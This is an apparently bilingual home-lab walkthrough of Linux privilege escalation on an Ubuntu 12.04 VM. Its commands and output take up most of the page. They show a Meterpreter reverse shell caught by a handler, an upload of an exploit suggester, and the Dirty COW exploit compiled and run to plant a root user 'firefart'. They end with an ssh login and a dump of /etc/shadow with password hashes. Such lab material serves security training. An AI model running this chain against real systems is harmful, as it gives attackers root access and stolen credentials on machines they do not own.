Linux Kernel Exploits
Linux Kernel Exploitation
Kernel exploits on Linux will typically target vulnerabilities in the Linux kernel to execute arbitrary code in order to run privileged system commands or to obtain a system shell.
This process will differ based on the Kernel version and distribution being targeted and the kernel exploit being used.
Privilege escalation on Linux systems will typically follow the following methodology:
- Identifying kernel vulnerabilities
- Downloading, compiling and transferring kernel exploits onto the target system.
Tools & Environment
Linux-Exploit-Suggester - This tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. It assesses (Using heuristics methods) the exposure of the given kernel on every publicly known Linux kernel exploit.
GitHub: https://github.com/mzet-/linux-exploit-suggester
Note: The techniques demonstrated in this video are performed on an Ubuntu 12.04 VM.
Linux 内核漏洞利用
Linux 内核利用
Linux 上的内核利用通常会针对 Linux 内核中的漏洞执行任意代码,以运行特权系统命令或获取系统 shell。
此过程将根据内核版本和目标发行版以及所使用的内核漏洞利用而有所不同。
Linux 系统上的权限提升通常遵循以下方法:
- 识别内核漏洞
- 下载、编译和传输内核漏洞到目标系统。
工具与环境
Linux-Exploit-Suggester - 此工具旨在帮助检测给定 Linux 内核/基于 Linux 的机器的安全缺陷。它评估(使用启发式方法)给定内核对每个公开已知的 Linux 内核漏洞的暴露程度。 GitHub:https://github.com/mzet-/linux-exploit-suggester
注意:本视频中演示的技术是在 Ubuntu 12.04 VM 上执行的。
Video
Perform some local enumeration:
1
meterpreter > sysinfo
What are the current privileges:
I’m currently logoned on or currently access to the target system with the privilege associated with user account www-data. This is a service account that you typically find on Linux system that have a Web server, or that hosting a Web server. This is a service account because it’s used to manage the actual Web server will be Apache or Ngnix. And it is generally speaking, unprivileged. It gives the fact that if you exploit the Web application or Web server, then this account is a safeguard and as a result, it is not a part of the sudo group or any administrative group on the Linux system and cannot execute any commands that require root privileges.
1
2
meterpreter > getuid
Server username: www-data
Verify this by opening up a shell session, and obtain a bash session here. List out the groups that www-data is a part of. It’ only a part of it’s own group. List out the user. If we try to update the repositary, it’s going to ask for a password, but because it is a service acount, it’s going to tell us right over here. It means we need to elevate our privilege, we are targeting a root account, as that is the account with highest privileges on a Linux system.
1
2
3
4
5
6
7
8
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ groups www-data
www-data@ubuntu:/tmp$ cat /etc/passwd
www-data@ubuntu:/tmp$ sudo apt-get update
sudo: no tty present and no askpass program sprcified
Sorry, try agian.
www-data@ubuntu:/tmp$ ^C
The way we are going to obatin root access is to use of the kernel vulnerability, kernel exploits.
Navigate to the /tmp directory within the Linux file system. It is a directory that stored the temporary file.
1
2
3
4
5
6
7
8
9
10
meterpreter > cd /tmp
meterpreter > ls
meterpreter > upload ~/Desktop/Linux-Enum/les.sh
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ ls
www-data@ubuntu:/tmp$ chmod +x les.sh
www-data@ubuntu:/tmp$ ls -alps
www-data@ubuntu:/tmp$ ./les.sh
www-data@ubuntu:/tmp$ ^C
Download the exploit code from the ExploitDB.
In terms of compilation of the actual exploits, there are few techniques that can be used, the first technique is to compile locally on Kali Linux, or you can transfer it over to the target system and complile it on that system.
1
sudo apt-get install gcc
1
2
3
4
5
cd Downloads
mv 40839.c dirty.c
ls
gcc -pthread dirty.c -o dirty -lcrypt
ls
Tranfer this over to the target system. Let’s see wether it works. If it dosen’t work, we will need to compile the C code on the target system.
1
2
3
4
5
6
meterpreter > upload ~/Download/dirty
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ ls
www-data@ubuntu:/tmp$ chmod +x dirty
www-data@ubuntu:/tmp$ ./dirty password123
We get a few errors here, this is because the exploit code was not compiled on that system.
1
2
www-data@ubuntu:/tmp$ rm dirty
www-data@ubuntu:/tmp$ ^C
1
2
3
4
5
6
7
8
9
meterpreter > upload ~/Downloads/dirty.c
meterpreter > shell
/bin/bash -i
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls
www-data@ubuntu:/tmp$ chmod +x dirty
www-data@ubuntu:/tmp$ ./dirty password123
www-data@ubuntu:/tmp$ cat /etc/passwd
www-data@ubuntu:/tmp$ su firefart
Login with ssh. List out the file that is only accessible by root user or users with root privileges, like the /etc/shadow file.
1
2
3
4
5
ssh firefart@10.10.10.15
firefart@ubuntu:~# sudo apt-get update
firefart@ubuntu:~# apt-get update
firefart@ubuntu:~# whoami
firefart@ubuntu:~# cat /etc/shadow
That is how to elevate your privilegs on a Linux system through the use of kernel exploit.
Home Lab
Target:
1
192.168.248.132
How to copy files from one machine to another using ssh
MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
How to copy files from one machine to another using ssh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~]
└─# nmap -sV 192.168.248.132
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 23:12 EDT
Nmap scan report for 192.168.248.132
Host is up (0.000053s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:D1:6F:51 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.248.148:1234
[*] Sending stage (3020772 bytes) to 192.168.248.132
[*] Meterpreter session 1 opened (192.168.248.148:1234 -> 192.168.248.132:49452) at 2022-10-27 23:19:04 -0400
meterpreter > sysinfo
Computer : 192.168.248.132
OS : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > shell
Process 1660 created.
Channel 1 created.
/bin/bash -i
www-data@ubuntu:/opt/exploits$ groups www-data
groups www-data
www-data : www-data
www-data@ubuntu:/opt/exploits$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
phos:x:1000:1000:phos,,,:/home/phos:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
www-data@ubuntu:/opt/exploits$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
利用meterpreter将linux-exploit-suggester.sh上传到目标的/tmp目录。
1
2
3
4
5
6
7
8
9
10
11
www-data@ubuntu:/tmp$ ls -al
ls -al
total 112
drwxrwxrwt 5 root root 4096 Oct 27 20:23 .
drwxr-xr-x 23 root root 4096 Oct 27 18:07 ..
drwxrwxrwt 2 root root 4096 Oct 27 19:13 VMwareDnD
-rw-rw-r-- 1 www-data www-data 90917 Oct 27 20:23 linux-exploit-suggester.sh
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root_1389-3980363888
www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2013-2094] perf_swevent
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Download URL: https://www.exploit-db.com/download/26131
Comments: No SMEP/SMAP bypass
[+] [CVE-2013-2094] perf_swevent 2
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
Download URL: https://cyseclabs.com/exploits/vnik_v1.c
Comments: No SMEP/SMAP bypass
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Exposure: probable
Tags: debian=7.0|8.0,[ ubuntu=* ]
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2014-4699] ptrace/sysret
Details: http://www.openwall.com/lists/oss-security/2014/07/08/16
Exposure: probable
Tags: [ ubuntu=12.04 ]
Download URL: https://www.exploit-db.com/download/34134
[+] [CVE-2014-4014] inode_capable
Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
Exposure: probable
Tags: [ ubuntu=12.04 ]
Download URL: https://www.exploit-db.com/download/33824
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2018-1000001] RationalLove
Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
Exposure: less probable
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-9322] BadIRET
Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
Exposure: less probable
Tags: RHEL<=7,fedora=20
Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Download URL: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/39230
[+] [CVE-2014-5207] fuse_suid
Details: https://www.exploit-db.com/exploits/34923/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/34923
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-1959] userns_root_sploit
Details: http://www.openwall.com/lists/oss-security/2013/04/29/1
Exposure: less probable
Download URL: https://www.exploit-db.com/download/25450
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0809] death_star (sudo)
Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
Exposure: less probable
Tags: fedora=16
Download URL: https://www.exploit-db.com/download/18436
在Kali上编译c文件,将编译好的二进制文件上传到目标。
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Downloads]
└─# ls
40839.c Nessus-10.2.0-debian9_amd64.deb
┌──(root㉿kali)-[~/Downloads]
└─# mv 40839.c dirty.c
┌──(root㉿kali)-[~/Downloads]
└─# gcc -pthread dirty.c -o dirty -lcrypt
在目标上无法执行该二进制文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter > getuid
Server username: www-data
meterpreter > upload /root/Downloads/dirty
[*] uploading : /root/Downloads/dirty -> dirty
[-] core_channel_open: Operation failed: 1
meterpreter > cd /tmp
meterpreter > upload /root/Downloads/dirty
[*] uploading : /root/Downloads/dirty -> dirty
[*] Uploaded -1.00 B of 17.27 KiB (-0.01%): /root/Downloads/dirty -> dirty
[*] uploaded : /root/Downloads/dirty -> dirty
meterpreter > shell
Process 4881 created.
Channel 3 created.
/bin/bash -i
www-data@ubuntu:/tmp$ ls -al
ls -al
total 132
drwxrwxrwt 5 root root 4096 Oct 27 20:52 .
drwxr-xr-x 23 root root 4096 Oct 27 18:07 ..
drwxrwxrwt 2 root root 4096 Oct 27 19:13 VMwareDnD
-rw-rw-r-- 1 www-data www-data 17688 Oct 27 20:52 dirty
-rwxrwxr-x 1 www-data www-data 90917 Oct 27 20:23 linux-exploit-suggester.sh
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root_1389-3980363888
www-data@ubuntu:/tmp$ chmod +x dirty
chmod +x dirty
www-data@ubuntu:/tmp$ ./dirty
./dirty
./dirty: /lib/x86_64-linux-gnu/libcrypt.so.1: version `XCRYPT_2.0' not found (required by ./dirty)
./dirty: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./dirty)
直接将c文件上传到目标,在目标上进行编译。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
meterpreter > ls
Listing: /tmp
=============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
041777/rwxrwxrwx 4096 dir 2022-10-27 22:13:45 -0400 VMwareDnD
100664/rw-rw-r-- 5006 fil 2022-10-27 23:55:52 -0400 dirty.c
100775/rwxrwxr-x 90917 fil 2022-10-27 23:23:42 -0400 linux-exploit-suggester.sh
040700/rwx------ 4096 dir 2022-10-27 22:13:45 -0400 vmware-root
040700/rwx------ 4096 dir 2022-10-27 22:13:45 -0400 vmware-root_1389-3980363888
meterpreter > shell
Process 9057 created.
Channel 1 created.
/bin/bash -i
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls -al
ls -al
total 136
drwxrwxrwt 5 root root 4096 Oct 27 21:03 .
drwxr-xr-x 23 root root 4096 Oct 27 18:07 ..
drwxrwxrwt 2 root root 4096 Oct 27 19:13 VMwareDnD
-rwxrwxr-x 1 www-data www-data 14116 Oct 27 21:03 dirty
-rw-rw-r-- 1 www-data www-data 5006 Oct 27 20:55 dirty.c
-rwxrwxr-x 1 www-data www-data 90917 Oct 27 20:23 linux-exploit-suggester.sh
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root
drwx------ 2 root root 4096 Oct 27 19:13 vmware-root_1389-3980363888
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
www-data@ubuntu:/tmp$ ./dirty password123
./dirty password123
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: 7f1e73243000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'password123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@ubuntu:/tmp$ /etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: 7f1e73243000
madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'password123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@ubuntu:/tmp$ cat /etc/passwd
cat /etc/passwd
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
phos:x:1000:1000:phos,,,:/home/phos:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
www-data@ubuntu:/tmp$ su firefart
su firefart
su: must be run from a terminal
firefart必须设置密码,才能通过ssh登录。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kali)-[~/Downloads]
└─# ssh firefart@192.168.248.132
firefart@192.168.248.132's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Thu Oct 27 21:21:48 2022
firefart@ubuntu:~# whoami
firefart
firefart@ubuntu:~# groups firefart
firefart : root
firefart@ubuntu:~# cat /etc/shadow
root:$6$/jLmt06/$G/0YOXYI78JSp/rucIyOJ2zUALrYEsXNoYXAYaaJDtVBM2r3euhocyt4rv/jJZrmMeQ4DxLSs5QhR8fa7cFNe.:19293:0:99999:7:::
daemon:*:19293:0:99999:7:::
bin:*:19293:0:99999:7:::
sys:*:19293:0:99999:7:::
sync:*:19293:0:99999:7:::
games:*:19293:0:99999:7:::
man:*:19293:0:99999:7:::
lp:*:19293:0:99999:7:::
mail:*:19293:0:99999:7:::
news:*:19293:0:99999:7:::
uucp:*:19293:0:99999:7:::
proxy:*:19293:0:99999:7:::
www-data:*:19293:0:99999:7:::
backup:*:19293:0:99999:7:::
list:*:19293:0:99999:7:::
irc:*:19293:0:99999:7:::
gnats:*:19293:0:99999:7:::
nobody:*:19293:0:99999:7:::
libuuid:!:19293:0:99999:7:::
syslog:*:19293:0:99999:7:::
messagebus:*:19293:0:99999:7:::
phos:$1$BGtRBZla$X2KekLHgNdS1Q52luDdFi.:19293:0:99999:7:::
sshd:*:19293:0:99999:7:::
firefart@ubuntu:~# uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
